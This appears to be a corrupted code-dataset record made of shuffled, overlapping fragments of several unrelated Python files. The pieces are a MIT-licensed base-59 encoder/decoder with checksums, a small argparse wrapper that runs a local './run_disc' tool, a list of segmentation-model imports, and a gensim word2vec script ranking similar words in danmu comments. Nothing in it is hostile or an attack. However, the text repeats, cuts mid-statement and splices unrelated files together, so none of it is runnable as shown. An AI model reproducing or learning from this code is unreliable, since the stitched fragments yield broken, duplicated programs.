parser.parse_args() fun = { (False,", "i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx", "decimal * self.base + i sum_chk += i sumsz += 1 sum_chk +=", "WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO", "= b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard input, to", "ord(a) self.decoder[o] = i x = -1 for a in self.translate: o =", "WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED", "KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF", "__init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder", "to whom the Software is # furnished to do so, subject to the", "limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or", "sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = []", "help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args =", "* 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i", "COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER", "sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 =", "OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__", "BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base =", "o = ord(a) i = self.decoder[o] if i < self.base: x = i", "for BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk", "% type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)): acc", "copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED", "in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for a", "or standard input, to standard output.\"\"\" import sys import argparse stdout = sys.stdout", "sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz / self.base", "= self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk >=", "portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT", "do so, subject to the following conditions: # # The above copyright notice", "= 0 for char in v: o = ord(char) i = self.decoder[o] if", "SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self,", "action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args", "chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk", "\"\"\"Encode an integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string", "args = parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode,", "(True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except", "THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR", "character\") decimal = decimal * self.base + i sum_chk += i sumsz +=", "THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding", "break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise", "+ self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\"", "permit persons to whom the Software is # furnished to do so, subject", "v = v[:-1] if chk < 0: continue if chk >= self.base: raise", "Permission is hereby granted, free of charge, to any person obtaining a copy", "return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\"", "v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v, str): v", "% self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode =", "self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main():", "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR", "IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT", "EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,", "Software without restriction, including without limitation the rights # to use, copy, modify,", "= v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base))", "b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard", "parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true',", "'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c',", "= i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer", "in v: o = ord(char) i = self.decoder[o] if i < 0: continue", "string sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz /", "\"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while", "self.decoder[o] if i < self.base: x = i else: self.decoder[o] = x def", "= len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk %", "# The above copyright notice and this permission notice shall be included in", "8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base))", "# of this software and associated documentation files (the \"Software\"), to deal #", "'0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate", "OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR", "string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])]", "fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data =", "CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE", "sell # copies of the Software, and to permit persons to whom the", "substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\",", "0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk =", "FILE, or standard input, to standard output.\"\"\" import sys import argparse stdout =", "a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for", "(sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode =", "# all copies or substantial portions of the Software. # # THE SOFTWARE", "= [self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o]", "return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\"", "if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk =", "= sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d',", "= parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)]", "restriction, including without limitation the rights # to use, copy, modify, merge, publish,", "= BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode", "+= 1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk %", "object is required, not '%s'\" % type(v).__name__) p, acc = 1, 0 for", "FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS", "sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?',", "= self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk]", "# # Permission is hereby granted, free of charge, to any person obtaining", "all copies or substantial portions of the Software. # # THE SOFTWARE IS", "class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base", "DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1'", "= self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return", "sumsz += 1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk", "BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR", "sumsz = len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk", "v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for char in", "= args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e) if not", "SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\"", "* c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk", "# Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is", "FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE", "OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT", "# # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission", "PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING", "continue if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base", "before encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True, False):", "if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0", "= { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n')", "files (the \"Software\"), to deal # in the Software without restriction, including without", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS", "< self.base: x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True):", "+ string sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz", "BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk =", "+= chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while", "% self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v,", "self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk >= self.base:", "8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded", "BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or", "b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard input,", "nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true',", "the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell", "i = self.decoder[o] if i < 0: continue if i >= self.base: raise", "self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode", "raise ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk += i", "following conditions: # # The above copyright notice and this permission notice shall", "if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc", "of the Software, and to permit persons to whom the Software is #", "v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii')", "encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and default_one:", "= -1 for a in self.translate: o = ord(a) i = self.decoder[o] if", "o = ord(a) self.decoder[o] = i x = -1 for a in self.translate:", "standard input, to standard output.\"\"\" import sys import argparse stdout = sys.stdout parser", "encode or decode FILE, or standard input, to standard output.\"\"\" import sys import", "if not i and default_one: return self.alphabet[0] string = \"\" sum_chk = 0", "The above copyright notice and this permission notice shall be included in #", "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR", "fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii')", "in map(ord, reversed(v)): acc += p * c p = p << 8", "% self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a", "ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk %", "self.decoder[o] if i < 0: continue if i >= self.base: raise ValueError(\"Invalid character\")", "<gh_stars>100-1000 # # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # #", "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER", "HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN", "including without limitation the rights # to use, copy, modify, merge, publish, distribute,", "encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v)", "= (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN',", "checksum before encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True,", "parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data", "return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as", "= '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate =", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER", "associated documentation files (the \"Software\"), to deal # in the Software without restriction,", "+ sumsz / self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode", "= len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o", "chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc,", "hereby granted, free of charge, to any person obtaining a copy # of", "of this software and associated documentation files (the \"Software\"), to deal # in", "OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS", "sumsz = 0 for char in v: o = ord(char) i = self.decoder[o]", "\"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet", "256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x", "BaseX\"\"\" if not i and default_one: return self.alphabet[0] string = \"\" sum_chk =", "0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal *", "# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,", "v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk", "def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and", "self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk +=", "notice shall be included in # all copies or substantial portions of the", "alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder =", "a BaseX encoded string as an integer\"\"\" if not isinstance(v, str): v =", "NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY", "raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff) acc >>=", "= v[:-1] if chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid", "# \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet,", "= divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz =", "help='append a checksum before encoding') args = parser.parse_args() fun = { (False, False):", "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of", "(self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self,", "decimal = 0 sum_chk = 0 sumsz = 0 for char in v:", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "main(): \"\"\"BaseX encode or decode FILE, or standard input, to standard output.\"\"\" import", "self.base: x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode" ]
[ "subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l',", "__name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str,", "argparse import sys from os.path import join from os import chdir import subprocess", "== '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='')", "type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args()", "argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools')", "'--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args =", "import argparse import sys from os.path import join from os import chdir import", "type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {} {}'.format(args.sge,args.filelist) print(command) subprocess.call(command.split())", "sys from os.path import join from os import chdir import subprocess if __name__", "'--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {} {}'.format(args.sge,args.filelist) print(command)", "from os import chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser()", "parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command", "'__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root',", "parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args", "default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {}", "os.path import join from os import chdir import subprocess if __name__ == '__main__':", "import chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge',", "default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root)", "parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {} {}'.format(args.sge,args.filelist)", "chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str,", "os import chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s',", "import sys from os.path import join from os import chdir import subprocess if", "= argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str,", "import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge')", "from os.path import join from os import chdir import subprocess if __name__ ==", "type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc", "import join from os import chdir import subprocess if __name__ == '__main__': parser", "join from os import chdir import subprocess if __name__ == '__main__': parser =", "if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist',", "'--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command =", "parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root'," ]
[ "from .fcnmodel import * from .gcnmodel import * from .linknetmodel import * from", "* from .fcnmodel import * from .gcnmodel import * from .linknetmodel import *", "* from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import *", "from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import * from", ".fcnmodel import * from .gcnmodel import * from .linknetmodel import * from .segnetmodel", "import * from .ducmodel import * from .fcnmodel import * from .gcnmodel import", ".gcnmodel import * from .linknetmodel import * from .segnetmodel import * from .tiramisu", "from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import * from", "import * from .dilatedmodel import * from .ducmodel import * from .fcnmodel import", ".deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import * from .fcnmodel", "from .deconvnetmodel import * from .deeplab_v2 import * from .deeplab_v2_multiscale import * from", "import * from .gcnmodel import * from .linknetmodel import * from .segnetmodel import", "import * from .linknetmodel import * from .segnetmodel import * from .tiramisu import", "* from .ducmodel import * from .fcnmodel import * from .gcnmodel import *", ".deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel", "* from .gcnmodel import * from .linknetmodel import * from .segnetmodel import *", "import * from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import", "import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import", "from .dilatedmodel import * from .ducmodel import * from .fcnmodel import * from", "from .gcnmodel import * from .linknetmodel import * from .segnetmodel import * from", "* from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import *", ".deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel", "from .linknetmodel import * from .segnetmodel import * from .tiramisu import * from", ".deconvnetmodel import * from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel", "* from .dilatedmodel import * from .ducmodel import * from .fcnmodel import *", ".dilatedmodel import * from .ducmodel import * from .fcnmodel import * from .gcnmodel", ".ducmodel import * from .fcnmodel import * from .gcnmodel import * from .linknetmodel", "from .ducmodel import * from .fcnmodel import * from .gcnmodel import * from", "* from .segnetmodel import * from .tiramisu import * from .tiramisu_nobias import *", "* from .linknetmodel import * from .segnetmodel import * from .tiramisu import *", ".linknetmodel import * from .segnetmodel import * from .tiramisu import * from .tiramisu_nobias", "* from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import *", "import * from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import", "import * from .fcnmodel import * from .gcnmodel import * from .linknetmodel import", "import * from .segnetmodel import * from .tiramisu import * from .tiramisu_nobias import", "from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from" ]
[ "from gensim.models import word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath", "topic word set wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split(", "try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not", "word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if", "word set wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( )", "for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model =", "#predict for each word and then calculate the most frequent topic word set", "calculate the most frequent topic word set wordFreq = {} for i in", "fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) #", "top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in", "operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by", "i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): #", "KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the", "fileTrainRead = [] #read the file by line with open(filePath) as fileTrainRaw: for", "# word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word)", "# word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try:", "word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords", "wordFreq[similarWord[0]] += 1 except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1),", "word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for", "#!/usr/bin/env python3 import re from gensim.models import word2vec from gensim.models import KeyedVectors from", "= re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx,", "except: pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _,", "binary=True) #predict for each word and then calculate the most frequent topic word", "import KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read", "word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) #", "= [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in enumerate(top10Words):", "re.match(r\"[【】╮╯▽╰╭★→「」\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()!,❤。~《》:()【】「」?”“;:、0-9a-zA-Z]+\", word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if", "pass top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word", "wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words = [k", "similarWord[0] not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass", "pre-trained word2vec vector set model = KeyedVectors.load_word2vec_format('/home/ubuntu/danmu/corpusWord2Vec.bin', binary=True) #predict for each word and", "import re from gensim.models import word2vec from gensim.models import KeyedVectors from operator import", "= [] #read the file by line with open(filePath) as fileTrainRaw: for line", "word): try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0]", "file by line with open(filePath) as fileTrainRaw: for line in fileTrainRaw: fileTrainRead.append(line) #load", "= re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if not", "not in wordFreq: wordFreq[similarWord[0]] = 1 else: wordFreq[similarWord[0]] += 1 except: pass top10Words", "j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = 